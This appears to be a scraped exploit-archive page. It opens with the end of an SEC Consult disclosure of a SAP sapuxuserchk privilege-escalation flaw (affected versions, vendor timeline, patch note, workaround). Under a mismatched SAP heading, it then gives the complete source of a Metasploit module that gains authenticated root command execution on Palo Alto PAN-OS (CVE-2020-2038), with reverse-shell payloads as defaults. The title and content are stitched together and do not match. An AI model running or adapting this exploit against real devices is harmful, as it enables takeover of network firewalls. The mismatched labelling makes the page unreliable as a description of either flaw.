         os.unlink(msg_file)

-------------------------------------------------------------------------

Vulnerable / tested versions:  
-----------------------------  
The following version of the binary was found to be vulnerable during our tests:  
* Version: 753, patch 400, changelist 1906766

According to the vendor the following products are affected by the discovered  
vulnerability:

SAP NetWeaver AS ABAP, AS Java, ABAP Platform and HANA Database, Versions:  
* KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, 7.87, 7.88  
* KRNL64NUC 7.22, 7.22EXT, 7.49  
* KRNL64UC 7.22, 7.22EXT, 7.49, 7.53  
* SAPHOSTAGENT 7.2

Please refer to the vendor patch day post:  
https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10

Vendor contact timeline:  
------------------------  
2022-02-25: Contacting vendor through vulnerability submission web form.  
2022-03-04: Vendor confirms receipt and assigns SAP security incident number  
             #2270008914.  
2022-04-29: Requesting status update.  
2022-05-05: Vendor confirms vulnerability and states it might be addressed  
             in May 2022 patch day.  
2022-06-14: Vendor releases patches with SAP security note 3158619.  
2022-06-15: Requesting the confirmation of the security note on the issue.  
2022-08-11: Vendor sends the link to the Acknowledgements to Security  
             Researchers.  
2022-09-02: Requesting the confirmation of the fix.  
2022-09-03: Vendor confirms the issue has been fixed on June Patch Day.  
2022-09-15: Public release of security advisory.

Solution:  
---------  
The following security note needs to be implemented:  
https://launchpad.support.sap.com/#/notes/3158619

Workaround:  
-----------  
You can remove the SUID-bit from sapuxuserchk as temporary mitigation.

# chmod 0755 sapuxuserchk

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF M. Li / @2022

SAP SAPControl Web Service Interface Local Privilege Escalation

This Metasploit module exploits an OS command injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts PAN-OS versions prior to 10.0.1, 9.1.4 and 9.0.10.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  require 'ipaddr'  class InvalidRequest < StandardError  end  class InvalidResponse < StandardError  end  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Palo Alto Networks Authenticated Remote Code Execution',        'Description' => %q{          An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated          administrators to execute arbitrary OS commands with root privileges.          This issue impacts PAN-OS versions < 10.0.1, < 9.1.4 and < 9.0.10        },        'Author' => [          'Mikhail Klyuchnikov', # Vulnerability discovery          'Nikita Abramov', # Vulnerability discovery          'UnD3sc0n0c1d0', # Exploit          'jheysel-r7' # msf module        ],        'References' => [          ['CVE', '2020-2038'],          ['URL', 'https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/'],          ['URL', 'https://security.paloaltonetworks.com/CVE-2020-2038'],          ['URL', 'https://github.com/und3sc0n0c1d0/CVE-2020-2038'] # Exploit        ],        'DisclosureDate' => '2020-09-09',        'License' => MSF_LICENSE,        'Platform' => 'linux',        'Privileged' => true,        'Targets' => [          [            'Linux ',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'CmdStagerFlavor' => %i[echo printf],              'Type' => :linux_dropper,              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }            }          ],          [            'Unix In-Memory',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_memory,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        OptString.new('USERNAME', [false, 'PAN-OS administrator username', 'admin']),        OptString.new('PASSWORD', [false, 'Password for username', 'admin'])      ]    )  end  def check    print_status('Authenticating...')    begin      @api_key = api_key    rescue InvalidRequest, InvalidResponse => e      return Exploit::CheckCode::Safe("Error retrieving API key: #{e.class}, #{e}")    end    res = send_request_cgi({      'method' => 'GET',      'keep_cookies' => 'true',      'uri' => normalize_uri(target_uri.path, 'api/'),      'vars_get' => {        'type' => 'version',        'key' => @api_key      }    })    return CheckCode::Unknown('The API did not respond to the request for the version of PAN_OS') unless res&.body    version = Rex::Version.new(res.get_xml_document.xpath('/response/result/sw-version').text)    if version >= Rex::Version.new('9.0.0') && version < Rex::Version.new('9.0.10') ||       version >= Rex::Version.new('9.1.0') && version < Rex::Version.new('9.1.4') ||       version >= Rex::Version.new('10.0.0') && version < Rex::Version.new('10.0.1')      return Exploit::CheckCode::Appears    end    Exploit::CheckCode::Safe  end  def api_key    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'api/'),      'vars_get' => {        'type' => 'keygen',        'user' => datastore['USERNAME'],        'password' => datastore['PASSWORD']      }    })    if res.nil?      raise InvalidRequest, 'Unreachable'    end    if res.code == 401      raise InvalidRequest, 'Server returned HTTP status 401 - Authentication failed'    end    if res.code == 403      raise InvalidRequest, 'Server returned HTTP status 403 - Authentication failed with "Invalid Credentials"'    end    if res.body.blank?      raise InvalidResponse, 'Empty reply from server'    end    key = res.get_xml_document.xpath('/response/result/key')&.text    if key.nil?      raise InvalidResponse, 'Empty reply from server'    end    print_good('Successfully obtained api key')    key  end  def execute_command(cmd, _opts = {})    payload = "<cms-ping><host>#{IPAddr.new(rand(2**32), Socket::AF_INET)}</host><count>#{rand(1..50)}</count><pattern>111<![CDATA[||#{cmd}||]]></pattern></cms-ping>"    send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'api/'),      'vars_get' => {        'cmd' => payload,        'type' => 'op',        'key' => @api_key      }    })  end  def exploit    begin      @api_key ||= api_key    rescue InvalidRequest, InvalidResponse => e      fail_with(Failure::UnexpectedReply, "Error retrieving API key: #{e}")    end    print_status('Exploiting...')    case target['Type']    when :unix_memory      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  endend

Tag

#ssl